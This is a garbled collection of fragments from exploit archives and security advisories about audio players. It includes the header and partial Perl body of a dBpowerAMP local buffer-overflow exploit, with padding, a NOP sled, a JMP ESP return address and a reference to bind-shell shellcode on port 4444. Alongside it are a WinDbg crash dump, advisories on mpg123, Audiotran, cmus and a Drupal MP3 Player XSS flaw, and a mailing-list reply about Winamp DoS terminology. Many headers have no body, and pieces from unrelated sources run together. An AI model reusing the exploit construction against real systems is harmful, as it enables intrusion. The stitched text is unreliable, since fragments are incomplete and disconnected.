* simo36.c
* CODED By SimO-s0fT (Morrocco-->marrakesh city)
* Home : Exploiter-ma.com
* e-mail: maroc-anti-connexion[at]hotmail.com[dot]com
*greetz : Stack & Djekmani4ever & alphanix & all friends
* dBpowerAMP Audio Player local buffer overflow exploit
*
* this feat was exploit windows trus sp2
* there is a small problem on the farm but fortunately I managed to use it
* and remember that this feat has been operating as trus win
* I test and winxp sp1 I found another problem
# dBpowerAMP Audio Player v2 ( .pls file) LoCaL BufferOverFlow Exploit
# Exploited By AlpHaNiX
# From NullArea.Net
# Thanks Stack For The PoC
system("cls") ;
print "\n\n\n[+] dBpowerAMP Audio Player v2 ( .pls file) LoCaL BufferOverFlow Exploit" ;
my $blah= "\x41" x 600;
my $nop = "\x90" x 52 ;
my $ret = "\xC7\xEB\xFA\x75" ; # 77C80F1A JMP ESP [ntdll v6.0 vista en ultimate]
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
An error in mpg123 might allow for the execution of arbitrary code.
Background
==========
mpg123 is a realtime MPEG 1.0/2.0/2.5 audio player for layers 1, 2 and
3.
Affected packages
=================
dBpowerAMP Audio Player Release 2 Remote Buffer Overflow
0:002> r
eax=00000000 ebx=77c17a50 ecx=00000000 edx=00000107 esi=00000000 edi=00b8f217
eip=00004141 esp=00b8ede0 ebp=77c0f931 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
00004141 ?? ???
EXCEPTION_RECORD: ffffffff -- (.exr ffffffffffffffff)
0x01 : Vendor description of software
-------------------------------------
From the vendor website:
"Audiotran is an audio player with speed and pitch changer."
0x02 : Vulnerability details
----------------------------
Audiotran suffers from a stack overflow in the handling of playlist files.
> DoS is not software crash, DoS is Denial of Service. It means,
> security impact of DoS vulnerability should be preventing (blocking)
> access of legitimate user to some data or service (via data
> corruption, service malfuction, etc).
It seems we have a different understanding of the term "Denial Of Service". In my opinion your explanation exactly matches this issue. As you said DoS is the attempt to make a (computer) resource unavailable to its user via data corruption etc. Here Winamp is the computer resource and the M3U file is the corrupted data. Sure the user can easily recover from this "DoS" by restarting the audio player and to be exact the M3U file is not a great example for corrupted data but I would still call this issue a DoS bug.
How would you name it? "Winamp 5.35 (Infinite) M3U File Inclusion Stack Overflow Exception"?
Best regards,
Thomas Waldegger
-----------------------------
Drupal is a free software package that allows an individual or a
community of users to easily publish, manage and organize a wide
variety of content on a website. (From: http://drupal.org/about)
The MP3 Player module allows users to use the WordPress Audio Player in Drupal.
The name of the mp3 file is not properly sanitized when the javascript
to create the audio player is generated, resulting in a cross site
scripting vulnerability.
Background
==========
The C* Music Player (cmus) is a modular and very configurable
ncurses-based audio player.
Affected packages
=================
-------------------------------------------------------------------
